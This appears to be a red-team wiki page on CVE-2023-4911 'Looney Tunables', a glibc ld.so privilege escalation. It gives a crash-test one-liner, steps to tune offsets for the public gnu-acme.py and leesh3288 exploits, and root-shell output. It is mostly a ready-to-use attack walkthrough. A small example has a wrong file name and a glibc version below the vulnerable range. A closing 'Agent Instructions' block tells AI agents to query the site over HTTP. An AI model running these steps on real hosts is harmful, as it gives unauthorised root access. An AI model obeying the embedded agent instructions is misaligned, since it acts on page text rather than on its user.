# Looney Tunables

## Theory

CVE-2023-4911 (Looney Tunables) is a buffer overflow vulnerability in GNU C Library’s dynamic loader’s, known as `ld.so`, when processing the GLIBC\_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC\_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.

This vulnerability was introduced in **glibc version 2.34** through commit 2ed18c. The vulnerability affects recent versions of major Linux distributions such as **RHEL, Ubuntu, Fedora , Debian, Amazon Linux, Gentoo** and **any other distribution that uses glibc**.

The vulnerability impacts major Linux distributions, including:

* Fedora 37 and 38
* Ubuntu 22.04 and 23.04
* Debian 12 and 13

## Practice

{% tabs %}
{% tab title="Enumerate" %}
To test directly whether the target is vulnerable, we can use the following command (vulnerable if there is a segmentation error):

```bash
$ env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped)
```

If glibc version is **greater or equal than 2.34**, target may be vulnerable

```bash
$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
```

Or we can retreive the version of glibc using the following C++ code

{% code title="glibc.cpp" %}

```cpp
#include <stdio.h>
#include <stdlib.h>
#include <gnu/libc-version.h>

int main(int argc, char *argv[])
{
    // Print glibc version
    printf("GNU libc version: %s\n", gnu_get_libc_version());
    exit(EXIT_SUCCESS);
}
```

{% endcode %}

Compile the above code using the following command:

```bash
g++ -std=c++11 glibc.c -o glibc
```

And execute it

```bash
./glibc
GNU libc version: 2.31
```

{% endtab %}

{% tab title="Exploit - 1" %}
Using [gnu-acme.py](https://haxx.in/files/gnu-acme.py) (python) from bl4sty, we can abuse CVE-2023-4911 and easily **adapt it to different ld.so build versions**.

If the build identifier of your ld.so target matches one of the script's targets. The exploit will work straight away.

```
python3 gnu-acme.py
```

If not, we have to find usable offsets for the ld.so build id. First you will have to find the target build identifier.

```bash
# Method 1: run gnu-acme.py
$ python3 gnu-acme.py
[...]
error: no target info found for build id b7ea093065488e439cf8ff6bc8bc545f5e1717c7

# Method 2: with native tools
$ readelf -n $(which ld.so) | grep "Build ID" | awk '{print $NF}' | xxd -r -p | tail -c 20 | xxd -p -c 20
b7ea093065488e439cf8ff6bc8bc545f5e1717c7
```

Now, on a similar environement (obviously with the same ld.so build version), disable ASLR and run gnu-acme.py. It will find usable offsets.

```bash
# On similar environement as the target
## Disable ASLR (as root)
echo 0 > /proc/sys/kernel/randomize_va_space

## Run gnu-acme.py
python3 gnu-acme.py
[...]
found working offset for ld.so 'b7ea093065488e439cf8ff6bc8bc545f5e1717c7' -> 620
found working offset for ld.so 'b7ea093065488e439cf8ff6bc8bc545f5e1717c7' -> 621
found working offset for ld.so 'b7ea093065488e439cf8ff6bc8bc545f5e1717c7' -> 622
found working offset for ld.so 'b7ea093065488e439cf8ff6bc8bc545f5e1717c7' -> 623
```

Take one of the working offset and add it to the TARGETS array of the gnu-acme.py script

<pre class="language-python"><code class="lang-python">TARGETS = {
    "69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
    "3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
<strong>    "b7ea093065488e439cf8ff6bc8bc545f5e1717c7": 620,
</strong>    "a99db3715218b641780b04323e4ae5953d68a927": 561,
    "a8daca28288575ffc8c7641d40901b0148958fb1": 580,
    "61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 560,
    "9a9c6aeba5df4178de168e26fe30ddcdab47d374": 580,
    "e7b1e0ff3d359623538f4ae0ac69b3e8db26b674": 580,
    "956d98a11b839e3392fa1b367b1e3fdfc3e662f6": 322,
}
</code></pre>

Now, on the target run exploit again !

```bash
$ python3 gnu-acme.py
[...]
** ohh... looks like we got a shell? **
whoami
root
```

{% endtab %}

{% tab title="Exploit - 2" %}
Using [this exploit](https://github.com/leesh3288/CVE-2023-4911) from leesh3288, we can abuse CVE-2023-4911.

{% hint style="info" %}
Code has been tested on Ubuntu 22.04.3 with glibc version `2.35-0ubuntu3.3`.
{% endhint %}

First we need to execute the Python script to generate the malicious libc.so.6

```bash
python3 gen_libc.py
```

Compile the exploit

```shell-session
gcc -o exp exp.c
```

Finally, you can launch the exploit and be patient since the exploitation may take some time (5 to 20 mins).

```bash
$ ./exp
try 100
try 200
[snip]
try 3700
try 3800
# whoami
root
```

{% endtab %}
{% endtabs %}

## Resources

{% embed url="<https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt>" %}

{% embed url="<https://tryhackme.com/room/looneytunes>" %}

{% embed url="<https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/redteam/privilege-escalation/linux/glibc-exploits/looney-tunables.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.